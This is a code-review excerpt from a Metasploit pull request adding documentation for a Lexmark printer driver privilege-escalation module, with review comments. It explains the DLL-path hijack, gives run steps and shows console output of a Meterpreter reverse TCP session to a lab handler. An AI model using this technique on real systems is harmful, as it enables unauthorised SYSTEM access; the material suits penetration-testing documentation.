documentation/modules/exploit/windows/local/lexmark_driver_privesc.md

```diff
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+[Various Lexmark printer drivers](http://support.lexmark.com/index?page=content&id=TE953) allow escalation of privileges on Windows systems.
+
+For vulnerable drivers, a low-privileged user can
+modify an XML configuration file and replace a
+DLL path with a malicious DLL path.
+
+`PrintIsolationHost.exe`, a Windows process running
+as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+during the installation of a printer. A user can
+elevate to SYSTEM by writing a malicious DLL to
+the vulnerable configuration file and adding a new
+printer with a vulnerable driver.
+
+This module leverages the `prnmngr.vbs` script
+to add and delete printers.
+
+## Verification Steps
+
+1. Install a vulnerable Lexmark driver
+2. Start msfconsole
+3. Get a session with basic privileges
+4. Do: `use exploit/windows/local/lexmark_driver_privesc`
+5. Do: `set SESSION <sess_no>`
+6. Do: `run`
+7. You should get a shell running as SYSTEM.
+
+## Scenarios
+
+### Tested with Lexmark Universal Print Driver v2 `v2.10.0.5`
+
+```
+msf6 > use multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/handler) > set lhost 10.0.0.8
+lhost => 10.0.0.8
+msf6 exploit(multi/handler) > set lport 1270
+lport => 1270
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 10.0.0.8:1270 
+[*] Sending stage (200262 bytes) to 10.0.0.7
+[*] Meterpreter session 1 opened (10.0.0.8:1270 -> 10.0.0.7:50356) at 2021-08-04 16:01:23 -0400
+
+meterpreter > getuid
+Server username: MOURNLAND\lowlevel
+meterpreter > sysinfo
+Computer        : MOURNLAND
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use lexmark_driver_privesc
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+
+Matching Modules
+================
+
+   #  Name                                          Disclosure Date  Rank    Check  Description
+   -  ----                                          ---------------  ----    -----  -----------
+   0  exploit/windows/local/lexmark_driver_privesc  2021-07-22       normal  Yes    Lexmark Driver Privilege Escalation
+
+
+Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/lexmark_driver_privesc
+
```

Comment:
```suggestion
```

Reply:
This seems to be extra output from some other command that got mismashed into this for some reason.

Reply:
Fixed with https://github.com/rapid7/metasploit-framework/pull/15519/commits/838142362cc6175cb23fd1be4f8e9470e927a960